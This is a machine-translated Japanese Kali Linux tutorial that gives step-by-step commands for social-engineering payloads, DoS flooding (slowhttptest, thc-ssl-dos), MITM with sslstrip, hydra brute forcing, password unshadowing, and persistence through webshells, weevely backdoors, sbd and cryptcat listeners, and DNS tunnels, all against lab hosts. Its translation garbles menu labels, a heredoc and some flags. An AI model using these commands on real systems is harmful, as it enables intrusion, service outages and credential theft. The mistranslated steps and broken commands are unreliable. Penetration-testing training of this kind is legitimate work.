*Social-Engineer Toolkit* (SET)は、ソーシャルエンジニアリング用に設計されたオープンソースの侵入テストフレームワークです。 SETには、短時間で信じられないほどの攻撃を行うことができるカスタム攻撃ベクトルが多数あります。 これらの種類のツールは、人間の振る舞いを使用して攻撃ベクトルに誘導します。

ソーシャルエンジニアツールキットの使用方法を学びましょう。

  • ステップ1 *-SETを開くには、アプリケーション→ソーシャルエンジニアリングツール→ソーシャルエンジニアリングツールの[設定]をクリックします。

ソーシャルエンジニアリングツール

ステップ2 *-使用条件に同意するかどうかを尋ねます。 次のスクリーンショットに示すように、「y」*と入力します。

タイプY

  • ステップ3 *-次のスクリーンショットに示されているメニューのほとんどは自明であり、その中で最も重要なのはナンバー1の「ソーシャルエンジニアリング攻撃」です。

自己説明

ステップ4 *-「1」と入力して、Enterを押します。 サブメニューが開きます。 もう一度 *Enter ボタンを押すと、各サブメニューの説明が表示されます。

スピアフィッシングモジュールを使用すると、電子メールメッセージを特別に作成し、 FileFormatmalicious ペイロードを添付して標的の被害者に送信できます。 たとえば、悪意のあるPDFドキュメントを送信すると、被害者が開くとシステムが危険にさらされます。 メールアドレスを偽装する場合は、「Sendmail」がインストールされていることを確認し(apt-get install sendmail)、config/set_config SENDMAIL = OFFフラグをSENDMAIL = ONに変更します。

スピアフィッシング攻撃には2つのオプションがあります-

  • 大量メール攻撃を実行する
  • FileFormatペイロードとソーシャルエンジニアリングテンプレートを作成する

1つ目はSETにすべてを行わせること(オプション1)、2つ目は独自のFileFormatペイロードを作成し、独自の攻撃で使用することです。

サードパーティ

「99」*と入力してメインメニューに戻り、「 2」*と入力して「Web攻撃ベクトル」に移動します。

Web攻撃モジュールは、複数のWebベースの攻撃を利用して、対象となる被害者を侵害するユニークな方法です。 このモジュールは、被害者がリンクをクリックした場合に被害者に対してフィッシング攻撃を実行することで使用されます。 リンクをクリックすると、さまざまな攻撃が発生する可能性があります。

マルチ攻撃

“ 99” *を入力してメインメニューに戻り、“ 3” *を入力します。

感染性のUSB/CD/DVDモジュールは、autorun.infファイルとMetasploitペイロードを作成します。 ペイロードと自動実行ファイルは、USBに書き込まれるかコピーされます。 DVD/USB/CDが被害者のマシンに挿入されると、自動実行機能がトリガーされ(自動実行が有効になっている場合)、システムが侵害される可能性があります。 使用したい攻撃ベクトルを選択できます:ファイル形式のバグまたはストレート実行可能ファイル。

Infectious Media Generatorのオプションは次のとおりです。

  • ファイル形式の悪用
  • 標準Metasploit実行可能ファイル

感染性

「99」*と入力して、メインメニューに戻ります。 次に、「 4」*と入力して、「Web攻撃ベクトル」に移動します。

ペイロードとリスナーの作成は、Metasploitペイロードを作成する簡単な方法です。 exeファイルがエクスポートされ、リスナーが生成されます。 exeファイルをダウンロードして実行し、シェルを取得するように被害者を説得する必要があります。

ペイロードの作成

「99」*と入力してメインメニューに戻り、「 5」*と入力して「Web攻撃ベクトル」に移動します。

Web攻撃ベクトル

マスメーラー攻撃により、複数の電子メールを被害者に送信し、メッセージをカスタマイズできます。 大量メール送信者には2つのオプションがあります。 1つは、単一のメールアドレスにメールを送信することです。 2番目のオプションを使用すると、すべての受信者の電子メールが含まれるリストをインポートでき、そのリスト内で必要な数のユーザーにメッセージが送信されます。

  • 電子メール攻撃単一の電子メールアドレス
  • 電子メール攻撃マスメーラー

「99」*と入力してメインメニューに戻り、「」9と入力して「Powershell Attack Vector」に移動します。

Powershell

Powershell Attack Vectorモジュールを使用すると、PowerShell固有の攻撃を作成できます。 これらの攻撃により、Windows Vista以降のすべてのオペレーティングシステムでデフォルトで使用可能なPowerShellを使用できます。 PowerShellは、ペイロードを展開し、予防技術によってトリガーされない機能を実行するための実り多い環境を提供します。

  • Powershell英数字シェルコードインジェクター
  • Powershell Reverse Shell
  • Powershell Bind Shell
  • PowershellダンプSAMデータベース

Kali Linux-ストレスツール

ストレスツールは、DoS攻撃を作成したり、さまざまなアプリケーションのストレステストを作成したりして、将来の適切な対策を講じるために使用されます。

すべてのストレステストツールは、アプリケーション→02-脆弱性分析→ストレステストにあります。

脆弱性分析

すべてのストレステストテストは、192.168.1.102のIPを持つmetsploitableマシンで実行されます。

ストレステスト

遅いhttptest

Slowhttptestは、DoS攻撃ツールの1つです。 特にHTTPプロトコルを使用してサーバーに接続し、CPUやRAMなどのリソースをビジーに保ちます。 それを使用する方法を詳細に見て、その機能を説明しましょう。

slowhttptestを開くには、最初にターミナルを開き、*“ slowhttptest –parameters” *と入力します。

「slowhttptest -h」と入力すると、使用する必要のあるすべてのパラメーターが表示されます。 「コマンドが見つかりません」という出力を受け取る場合は、最初に*「apt-get install slowhttptest」*と入力する必要があります。

HTTPテストの表示

コマンドが見つかりません

次に、インストール後、再度 slowhttptest –h と入力します

遅いヘッダー

次のコマンドを入力します-

slowhttptest -c 500 -H -g -o outputfile -i 10 -r 200 -t GET –u
http://192.168.1.202/index.php -x 24 -p 2

どこで、

  • *(-c 500)= 500 *接続
  • (-H) =スローロリスモード
  • -g =統計を生成する
  • -o outputfile =出力ファイル名
  • -i 10 = 10秒を使用してデータを待機します
  • -r 200 = -t GET = GETリクエストを使用した200接続
  • * -u http://192.168.1.202/index.php* =ターゲットURL
  • -x 24 =最大24バイトの長さ
  • -p 2 = 2秒のタイムアウト

Time Seconds

テストが開始されると、出力は次のスクリーンショットのようになり、サービスが利用可能であることがわかります。

テスト開始

しばらくすると、287接続でサービスがダウンします。 これは、サーバーが最大287のHTTP接続を処理できることを意味します。

接続

Inviteflood

Invitefloodは、UDP/IPを介してフラッディングするSIP/SDP INVITEメッセージです。 さまざまなLinuxディストリビューションで実行されます。 複数のINVITE要求を送信することにより、SIPデバイスに対してDoS(サービス拒否)攻撃を実行します。

Invitefloodを開くには、まずターミナルを開いて*「inviteflood –parameters」*と入力します

ヘルプについては、*“ inviteflood –h” *を使用できます

Invite Flood

次に、次のコマンドを使用できます-

inviteflood eth0 target_extension  target_domain target_ip number_of_packets

どこで、

  • target_extension は2000です
  • target_domain は192.168.x.xです
  • target_ip は192.168.x.xです
  • number_of_packets は1です
  • -a はSIPアカウントのエイリアスです

ターゲット実行

ヤクスフラッド

IaxfloodはVoIP DoSツールです。 それを開くには、ターミナルで*“ iaxflood sourcename destinationname numpackets” *と入力します。

使用方法を知るには、*“ iaxflood –h” *と入力します

Iaxflood

thc-ssl-dos

THC-SSL-DOSは、SSLのパフォーマンスを検証するツールです。 セキュアなSSL接続を確立するには、サーバーの処理能力がクライアントの15倍以上必要です。 THCSSL-DOSは、サーバーに負荷をかけ、インターネットからそれをノックアウトすることにより、この非対称プロパティを悪用します。

以下はコマンドです-

thc-ssl-dos victimIP httpsport –accept

この例では、それは-

thc-ssl-dos 192.168.1.1 443 –accept

その出力は次のようになります-

SSLパフォーマンス

SSLエラー

Kali Linux-スニッフィングとなりすまし

スニッフィングツールの基本概念は盗聴と同じくらい簡単で、Kali Linuxにはこの目的のための一般的なツールがいくつかあります。 この章では、カリで利用可能なスニッフィングおよびスプーフィングツールについて学習します。

バープスイート

Burpsuiteは、ブラウザーとWebサーバー間のスニッフィングツールとして使用して、Webアプリケーションが使用するパラメーターを見つけることができます。

Burpsuiteを開くには、アプリケーション→Webアプリケーション分析→burpsuiteに移動します。

Web Analysis

スニッフィングのセットアップを行うために、burpsuiteをプロキシとして動作するように設定します。 これを行うには、次のスクリーンショットに示すように*オプション*に移動します。 図のようにボックスをチェックします。

この場合、プロキシIPはポート8080で127.0.0.1になります。

プロキシIP

次に、burpsuiteマシンのIPであるブラウザープロキシとポートを構成します。

ブラウザの設定

インターセプトを開始するには、[プロキシ]→[インターセプト]に移動し、[インターセプトがオン]をクリックします。

脆弱性をテストするためのパラメーターを検索するWebページで引き続き移動します。

インターセプト

この場合、IP 192.168.1.102のメタスプロイ可能なマシンです。

マシンIP

「HTTP履歴」に移動します。 次のスクリーンショットでは、赤い矢印でマークされた行が最後のリクエストを示しています。 Rawでは、セッションIDなどの非表示パラメーターと、ユーザー名やパスワードなどの他のパラメーターに赤の下線が付いています。

リクエストパラメータ

mitmproxy

*mitmproxy* は、SSL対応の中間者HTTPプロキシです。 トラフィックフローをオンザフライで検査および編集できるコンソールインターフェイスを提供します。

それを開くには、ターミナルに移動して*「mitmproxy -parameter」と入力し、コマンドのヘルプを表示するには「mitmproxy -h」*と入力します。

Mitmproxy

mitmproxyを開始するには、*“ mitmproxy –p portnumber” *と入力します。 この場合、「mitmproxy -p 80」です。

ポート番号

ワイヤーシャーク

Wiresharkは、最高のデータパケットアナライザーの1つです。 フレームレベルでパケットを深く分析します。 Wiresharkの詳細については、公式Webページhttps://www.wireshark.org/から入手できます。 カリでは、アプリケーション→スニッフィングとなりすまし→wiresharkのパスを使用して検出されます。

Wireshark

wiresharkをクリックすると、次のGUIが開きます。

Wireshark GUI

「開始」をクリックすると、次のスクリーンショットに示すようにパケットキャプチャが開始されます。

パケットキャプチャ

sslstrip

*sslstrip* は、被害者のブラウザにHTTPを介したプレーンテキストでの通信を強制するMITM攻撃であり、プロキシはHTTPSサーバーからのコンテンツを変更します。 これを行うために、sslstripはhttps://URLを「ストリッピング」し、http://URLに変換します。

開くには、アプリケーション→09-Sniffing&Spoofing→Spoofing and MITM→sslstripに移動します。

なりすまし アプリケーションMITM

設定するには、すべての80ポート通信を8080に転送するように記述します。

ポート通信

次に、必要なポートに対して sslstrip コマンドを開始します。

SSLtripコマンド

Kali Linux-パスワードクラッキングツール

この章では、Kali Linuxで使用される重要なパスワードクラッキングツールについて学習します。

ヒドラ

Hydraは、攻撃する多くのプロトコルをサポートするログインクラッカーです(Cisco AAA、Cisco auth、Cisco enable、CVS、FTP、HTTP(S)-FORM-GET、HTTP(S)-FORM-POST、HTTP(S)-GET、 HTTP(S)-HEAD、HTTP-Proxy、ICQ、IMAP、IRC、LDAP、MS-SQL、MySQL、NNTP、Oracle Listener、Oracle SID、PC-Anywhere、PC-NFS、POP3、PostgreSQL、RDP、Rexec、Rlogin 、Rsh、SIP、SMB(NT)、SMTP、SMTP Enum、SNMP v1 + v2 + v3、SOCKS5、SSH(v1およびv2)、SSHKEY、Subversion、Teamspeak(TS2)、Telnet、VMware-Auth、VNCおよびXMPP) 。

開くには、アプリケーション→パスワード攻撃→オンライン攻撃→hydraに移動します。

Hydra

次のスクリーンショットに示すように、ターミナルコンソールが開きます。

ターミナルを開く

この場合、IP 192.168.1.101を持つmetasploitableマシンのFTPサービスをブルートフォースします。

ブルートフォース

パス usr \ share \ wordlist \ metasploit に、拡張子が「lst」の単語リストをカーリーで作成しました。

ワードリストの共有

コマンドは次のようになります-

hydra -l/usr/share/wordlists/metasploit/user -P
/usr/share/wordlists/metasploit/passwords ftp://192.168.1.101 –V

ここで、 – V は試行中のユーザー名とパスワードです。

Hydra Command

次のスクリーンショットに示すように、ユーザー名とパスワードはmsfadmin:msfadminです。

管理者パスワード

ジョニー

  • ジョニー*はジョン・ザ・リッパーのパスワードクラッキングツール用のGUIです。 一般的に、弱いパスワードに使用されます。

開くには、アプリケーション→パスワード攻撃→johnnyに移動します。

ジョニー

この場合、次のコマンドでKaliマシンのパスワードを取得し、デスクトップにファイルが作成されます。

デスクトップ

[Passwdファイルを開く]→[OK]をクリックすると、次のスクリーンショットのようにすべてのファイルが表示されます。

ファイルを開く

「攻撃を開始」をクリックします。

攻撃の開始

攻撃が完了した後、「パスワード」の左側のパネルをクリックすると、パスワードの陰影が解除されます。

シェーディングなし

John

*john* は、Johnny GUIのコマンドラインバージョンです。 起動するには、ターミナルを開いて*「john」*と入力します。

シャドウイング解除

パスワードのシャドウを解除する場合、次のコマンドを記述する必要があります-

root@kali:~# unshadow passwd shadow > unshadowed.txt

レインボークラック

RainbowCrackソフトウェアは、レインボーテーブルルックアップによってハッシュをクラックします。 レインボーテーブルは、ハードディスクに保存されている通常のファイルです。 通常、Rainbowテーブルはオンラインで購入するか、さまざまなツールでコンパイルできます。

それを開くには、アプリケーション→パスワード攻撃→に移動し、「rainbowcrack」をクリックします。

RainbowCrack

ハッシュパスワードをクラックするコマンドは-

rcrack path_to_rainbow_tables -f path_to_password_hash

SQLdict

SQLサーバー用の辞書攻撃ツールであり、使用するのが非常に簡単で基本的です。 それを開くには、ターミナルを開いて*「sqldict」*と入力します。 次のビューが開きます。

Sql Dict

[ターゲットIPサーバー]で、SQLを保持しているサーバーのIPを入力します。 [ターゲットアカウント]で、ユーザー名を入力します。 次に、ファイルにパスワードをロードし、完了するまで「開始」をクリックします。

ハッシュ識別子

ハッシュの種類、つまりハッシュの用途を識別するために使用されるツールです。 たとえば、HASHがある場合、Linux HASHかWindows HASHかがわかります。

ハッシュ識別子

上記の画面は、MD5ハッシュである可能性があり、ドメインキャッシュされた資格情報のようです。

Kali Linux-アクセスの維持

この章では、Kaliが接続を維持し、ハッキングされたマシンが再び接続および切断された場合でも、ハッキングされたマシンへのアクセスに使用するツールについて説明します。

Powersploit

これは、Windowsマシン用のツールです。 被害者のマシンにPowerShellがインストールされています。 このツールは、ハッカーがPowerShellを介して被害者のマシンに接続するのに役立ちます。

それを開くには、左側の端末を開き、次のコマンドを入力してpowersploitフォルダーに入ります-

cd/usr/share/powersploit/
  • 「ls」*と入力すると、アクセスして被害者のマシンにダウンロードしてインストールできるすべてのpowersploitツールがリストされます。 それらのほとんどは、名前に応じて自己説明された名前です。

Powersploit

被害者のマシンにこのツールをダウンロードする簡単な方法は、Webサーバーを作成することです。これにより、powersploitツールは次のコマンドを使用して簡単に作成できます-

python -m SimpleHTTPServer

ダウンロードツール

この後、「http://<Kali machine ip_address>:8000/」と入力すると、次のようになります。

Directory Listimg

Sbd

sbdはNetcatに似たツールです。 移植性があり、LinuxおよびMicrosoftマシンで使用できます。 sbdはAES-CBC-128 + HMAC-SHA1暗号化を備えています>基本的に、特定のポートでいつでも被害者のマシンに接続し、リモートでコマンドを送信するのに役立ちます。

それを開くには、ターミナルに移動し、サーバーが接続を受け入れるように*“ sbd -l -p port” *と入力します。

接続受け入れ

この場合、サーバーがリッスンするポート44を配置します。

ケースポート

被害者のサイトで、*「sbd IPofserver port」*と入力します。 リモートコマンドを送信できる接続が確立されます。

この場合、同じマシンでテストを実行したため、「localhost」です。

Ipofserver

最後に、サーバーで次のスクリーンショットに示すように接続が発生したことがわかります。

サーバー接続

ウェブシェル

Webshel​​lは、アクセスを維持したり、Webサイトをハッキングするために使用できます。 しかし、それらのほとんどはアンチウイルスによって検出されます。 C99 phpシェルは、ウイルス対策プログラムでよく知られています。 一般的なアンチウイルスは、マルウェアとして簡単に検出します。

通常、それらの主な機能は、Webインターフェイスを介してシステムコマンドを送信することです。

それを開き、ターミナルで _“ cd/usr/share/webshel​​ls/” _ と入力します。

Webshel​​l

ご覧のとおり、それらはプログラミング言語に応じてクラスに分割されています:asp、aspx、cfm、jsp、perl、php

PHPフォルダーに入力すると、PHP WebページのすべてのWebシェルを表示できます。

フォルダー

シェルをWebサーバーにアップロードするには、たとえば*“ simple-backdoor.php” *でWebページとWebシェルのURLを開きます。

最後に、cmdコマンドを作成します。 次のスクリーンショットのように、すべての情報が表示されます。

コマンドの書き込み

ウィーブリー

Weevelyは、telnetのような接続をシミュレートするPHP Webシェルです。 これは、悪用されたWebアプリケーション用のツールであり、ステルスバックドアとして、または正当なWebアカウントを管理するWebシェルとして使用できます。

開くには、ターミナルに移動して「weevely」と入力し、使用状況を確認します。

Weevely

シェルを生成するには、*「weebly generate password pathoffile」*と入力します。 次のスクリーンショットに示すように、「デスクトップ」フォルダーに生成され、ファイルをWebサーバーにアップロードしてアクセスできるようにします。

シェルの生成

次のスクリーンショットに示すようにWebシェルをアップロードした後、セッションが開始されたことを確認できるコマンド*「weevely URL password」*を使用して、cmdでサーバーに接続できます。

ファイルのアップロード

http-tunnel

http-tunnelは、HTTP要求でトンネリングされる双方向の仮想データストリームを作成します。 必要に応じて、HTTPプロキシ経由でリクエストを送信できます。 これは、制限されたファイアウォールの背後にいるユーザーに役立ちます。 HTTPプロキシを介したWWWアクセスが許可されている場合、http-tunnelとtelnetまたはPPPを使用してファイアウォールの外側のコンピューターに接続できます。

まず、次のコマンドでトンネルサーバーを作成する必要があります-

httptunnel_server –h

次に、クライアントサイトで*“ httptunnel_client –h” *と入力すると、両方が接続の受け入れを開始します。

dns2tcp

これも、UDP 53ポートを意味するDNSトラフィックを介してTCPトラフィックを渡すのに役立つトンネリングツールです。

開始するには、*“ dns2tcpd” *と入力します。 スクリプトを開くときに使用方法が説明されます。

DNSTcp

サーバーサイトでこのコマンドを入力して、ファイルを構成します。

#cat >>.dns2tcpdrc
<&l;END listen = 0.0.0.0
port = 53 user=nobody
chroot =/root/dns2tcp
pid_file =/var/run/dns2tcp.pid
domain = your domain key = secretkey
resources = ssh:127.0.0.1:22
END
#dns2tcpd -f .dns2tcpdrc

クライアントサイトで、このコマンドを入力します。

# cat >>.dns2tcprc
<<END domain = your domain
resource = ssh
local_port = 7891
key = secretkey
END
# dns2tcpc -f .dns2tcprc
# ssh root@localhost -p 7891 -D 7076

このコマンドでトンネリングが開始されます。

クリプトキャット

これは、暗号化された方法で被害者のマシンとTCPおよびUDP接続を確立できるNetcatのような別のツールです。

サーバーを起動して接続をリッスンするには、次のコマンドを入力します-

cryptcat –l –p port –n

cryptcat

どこで、

  • -l は接続を聞くことを意味します
  • -p はポート番号パラメーターを表します
  • -n は名前解決を行わないことを意味します

クライアントサイトでは、接続コマンドは*「cryptcat IPofServer PortofServer」*です

サーバーのポート

Kali Linux-リバースエンジニアリング

この章では、Kali Linuxのリバースエンジニアリングツールについて学習します。

OllyDbg

OllyDbgは、Microsoft Windowsアプリケーション用の32ビットアセンブラレベル分析デバッガです。 バイナリコード分析を重視すると、ソースが利用できない場合に特に役立ちます。 一般的に、商用ソフトウェアをクラックするために使用されます。

開くには、アプリケーション→リバースエンジニアリング→ollydbgに移動します

OllyDbg

EXEファイルをロードするには、黄色の「Opening folder」に移動します。これは上のスクリーンショットの赤い四角に表示されています。

ロード後、次のビューが表示され、バイナリを変更できます。

バイナリ

dex2jar

これは、ソースコードを表示するためにAPKファイル(Android)をJARファイルに変換するのに役立つアプリケーションです。 これを使用するには、ターミナルを開いて*” d2j-dex2jar –d/file location” *と記述します。

この場合、ファイルはデスクトップ上の*“ classes.dex” *です。

クラス

次の行は、JARファイルが作成されたことを示しています。

ジャーファイル

作成されたファイル

jd-gui

JD-GUIは、*“。class” *ファイルのJavaソースコードを表示するスタンドアロンのグラフィカルユーティリティです。 再構築されたソースコードを参照できます。 この場合、dex2jarツールから抽出したファイルを再構築できます。

起動するには、ターミナルを開いて*「jd-gui」*と入力すると、次のビューが開きます。

ファイルをインポートするには、左上隅にある開いているフォルダーフォルダーを開くアイコンをクリックして、ファイルをインポートします。

Jd Gui

apktool

Apktoolは、Androidアプリケーション全体を反転させるための最良のツールの1つです。 リソースをほぼ元の形式にデコードし、変更後に再構築できます。

開くには、ターミナルに移動して「* apktool」*と記述します。

apkファイルを逆コンパイルするには、「apktool d * apk file」*と記述します。

Apktool

次のスクリーンショットに示すように、逆コンパイルが開始されます。

逆コンパイル

Kali Linux-レポートツール

この章では、Kali Linuxのいくつかのレポートツールについて学習します。

ドラディス

私たちが行ったこのすべての作業では、作成された結果を共有したり、作業を追跡したりすることが重要です。 この目的のために、KaliにはWebサービスであるdradisと呼ばれるレポートツールがあります。

ステップ1 *-Dradisを開始するには、「service dradis start」*と入力します。

Dradis

  • ステップ2 *-開くには、アプリケーション→レポートツール→dradisに移動します。

レポート

Web URLが開きます。 LAN内の誰でも、次のURLで開くことができます。 https://IP kali machine:3004

初めて使用したユーザー名とパスワードでログインします。

LANオープン

  • ステップ3 *-ログイン後、NMAP、NESSUS、NEXPOSEからファイルをインポートできます。 これを行うには、「ファイルからインポート」に進み、「新しいインポーター(リアルタイムフィードバック付き)」をクリックします。

リアルタイムのインポート

  • ステップ4 *-アップロードするファイルタイプを選択します。 この場合、「Nessus scan」→「参照」をクリックします。

アップロードマネージャー

ここでホームページに移動すると、左側のパネルで、インポートされたスキャンがホストとポートの詳細を含むフォルダーにあることがわかります。

ポートの詳細

メタグーフィル

MetagoofilはGoogleで検索を実行し、ドキュメントを特定してローカルディスクにダウンロードし、メタデータを抽出します。 特定の会社、個人、オブジェクトなどに属する公開ドキュメントのメタデータを抽出します。

開くには、*“ usr/share/metagoofil/” *に移動します。

Metagoofil

検索を開始するには、次のコマンドを入力します-

python metagoofil.py

このコマンドで次のパラメータを使用できます-

  • –d (ドメイン名)
  • –t (dox、pdfなどをダウンロードするためのファイルタイプ)
  • –l (結果の制限10、10、)
  • –n (ダウンロードするファイルを制限する)
  • –o (ファイルを保存する場所)
  • –f (出力ファイル)

次の例では、ドメイン名のみが非表示になっています。

非表示のドメイン名